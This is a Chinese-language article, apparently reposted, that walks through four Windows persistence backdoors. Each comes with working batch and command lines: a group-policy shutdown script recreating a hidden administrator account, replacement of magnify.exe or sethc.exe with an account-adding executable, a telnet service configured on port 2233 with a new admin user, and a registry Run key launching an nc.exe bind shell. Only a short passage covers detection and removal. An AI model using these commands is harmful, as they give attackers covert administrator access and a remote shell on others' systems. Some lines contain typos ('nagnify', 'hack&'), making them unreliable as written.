原文:揭秘Windows系統的四個后門
組策略欺騙后門
創建一個批處理文件add.bat,內容是:
@echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit
(2)利用
上傳運行gpedit.msc,定位到“計算機配置一>Windows設置一>腳本(啟動/關機)”, 雙擊右邊窗口的“關機”,在其中添加add.bat。
這樣就實現了當系統關機時創建hack$用戶,及時被刪了,關機時又會再次創建。
還可以實現開機時添加賬戶,關機時刪除賬戶等等。可以把bat轉換成exe,上傳到目標機器,偽裝成系統程序等等。
放大鏡程序后門
思路:偽造替換 magnify.exe
(1) 構造批處理腳本:magnify.bat
@echo off net user hack$ test168 /add net localgroup administrators hack$ /add %Windir%\system32\nagnify.exe exit
作用:先創建管理員用戶,在運行原來的放大鏡程序
(2)文件格式轉換
利用bat2com / com2exe,BatToEXE(圖形化工具)等工具把Bat文件轉換成exe文件,如:
bat2com magnify.bat 將magnify.bat轉換成magnify.com
com2exe magnify.com 將magnify.com轉換成magnify.exe
(3)利用批處理自動替換
@echo off copy %Windir%\system32\dllcache\magnify.exe nagnify.exe 將放大鏡程序備份為nagnify.exe copy %Windir%\system32\magnify.exe nagnify.exe replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache 替換放大鏡程序 replace.exe %Windir%\magnify.exe %Windir%\system32 exit
(4)使用:登陸時通過組合鍵 Win+U 調用
(5) 防范措施
進入%Windir%\system32\查看magnify.exe的文件圖標是否是原來的放大鏡的圖標,如果不是的話極有可能被植入了放大鏡后門。
當然,有的時候攻擊者也會將其文件圖標更改為和原放大鏡程序的圖標一樣。此時我們可以查看magnify.exe文件的大小和修改時間,如果這兩樣有一項不符就比較懷疑了。我們也可以先運行magnify.exe,然后運行查看是否有可疑的用戶。
如果確定服務器被放置了放大鏡后門,首先要刪除該文件,然后恢復正常的放大鏡程序。當然,我們也可以做得更徹底一些,用一個無關緊要的程序替換放大鏡程序。甚至我們也可以以其人之道還治其人之身,構造一個magnify.exe,通過其警告攻擊者或者進行入侵監控和取證。
補充:與放大鏡后門類似的還有“粘滯鍵”后門,即按下SHIEF鍵五次可以啟動粘滯鍵功能,其利用和防范措施與放大鏡后門類似,只是將magnify.exe換成了sethc.exe。
telnet后門
tlntadmn config port=2233 //修改 telnet默認端口
sc config tlntsvr start= auto
net start telnet
一個批處理,可以根據需要修改。轉換成exe等等,思路很多。。。
@echo off sc config tlntsvr start= auto @net start telnet @tlntadmn config sec =passwd @tlntadmn config port = 2233 @net user hack& 123456789 /add @net localgroup administrators hack$ /add @pause @md c:\windows\ShareFolder @net share MyShare=c:\windows\ShareFolder
msf權限維持模塊:exploit/windows/local/registry_persistence
可以修改注冊表,增加后門自啟動代碼.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
相關文章:Windows、Linux后門解析
http://www.freebuf.com/articles/system/91791.html